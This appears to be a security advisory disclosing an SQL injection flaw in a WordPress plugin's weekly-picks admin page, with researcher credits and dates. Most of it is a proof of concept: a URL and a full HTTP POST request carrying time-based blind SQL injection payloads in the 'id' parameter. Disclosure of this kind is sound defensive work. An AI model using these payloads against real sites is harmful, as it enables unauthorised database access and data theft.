The plugin does not sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.
https://example.com/wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf) POST /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------19015747673015629704320873707 Content-Length: 733 Origin: http://localhost:8080 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------19015747673015629704320873707 Content-Disposition: form-data; name="id" 2 AND (SELECT 7741 FROM (SELECT(SLEEP(10)))hlAf) -----------------------------19015747673015629704320873707 Content-Disposition: form-data; name="imagefile"; filename="comicbookmanagementsystemweeklypicks_2_step-9.png" Content-Type: image/png PNG
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Kunal Sharma
Yes
2022-11-14 (about 6 months ago)
2022-11-14 (about 6 months ago)
2022-12-02 (about 5 months ago)